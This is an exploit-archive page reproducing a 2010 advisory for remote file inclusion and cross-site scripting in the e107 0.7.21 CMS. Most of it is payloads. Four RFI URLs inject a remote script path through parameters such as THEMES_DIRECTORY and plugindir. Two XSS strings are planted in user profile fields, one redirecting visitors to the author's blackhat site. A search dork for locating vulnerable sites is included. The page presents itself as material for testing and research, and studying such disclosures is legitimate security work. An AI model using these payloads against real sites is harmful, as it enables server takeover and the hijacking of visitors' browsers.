Advertisement






e107 0.7.21 cross site scripting and remote file inclusion

CVE Category Price Severity
N/A CWE-79, CWE-98 Unknown High
Author Risk Exploitation Type Date
Exploit Alert High Remote 2010-06-05
CPE
cpe:cpe:/a:e107:0.7.21
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010060013

Below is a copy:

====================================================================
# e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities 
=== 
1                   ____/ >> Exploit database separated by exploit   0 

0                   /___/          type (local, remote, DoS, etc.)    1 

1                                                                      1 

0  [+] Site            : Inj3ct0r.com                                  0 

1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 

0                                                                      0 

1                    ####################################              1 

0                  I'm indoushka member from Inj3ct0r Team             1 

1                    ####################################              0 

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 

  

######################################################################## 

# Name: e107 0.7.21 full (RFI) Vulnerabilities 
# Vendor: http://e107.org/ 
# Date: 2010-05-27 
# Author : indoushka 
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
# Contact : [email protected] 
# Home : www.arab-blackhat.co.cc
# Bug  : RFI 
# Tested on : windows SP2 Franais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : This site is powered by e107, which is released under the terms of the GNU GPL License.    
                                                                 
# Exploit By indoushka 

I - RFI:

1 - http://localhost/e107/fpw.php?THEMES_DIRECTORY=http://localhost/c.txt?

2 - http://localhost/e107/e107_handlers/secure_img_render.php?ifile=http://localhost/c.txt?

3 - http://localhost/e107/e107_plugins/content/handlers/content_class.php?plugindir=http://localhost/c.txt?

4 - http://localhost/e107/e107_plugins/content/handlers/content_convert_class.php?plugindir=http://localhost/c.txt?

II - XSS :

After Rigester Go to user Seting

1 - http://127.0.0.1/e107/usersettings.php

and Edit Signature / Timezone Put this code Or other's 

( ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>""""> )

( <ScRiPt>alert(213771818860)</ScRiPt> )


Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum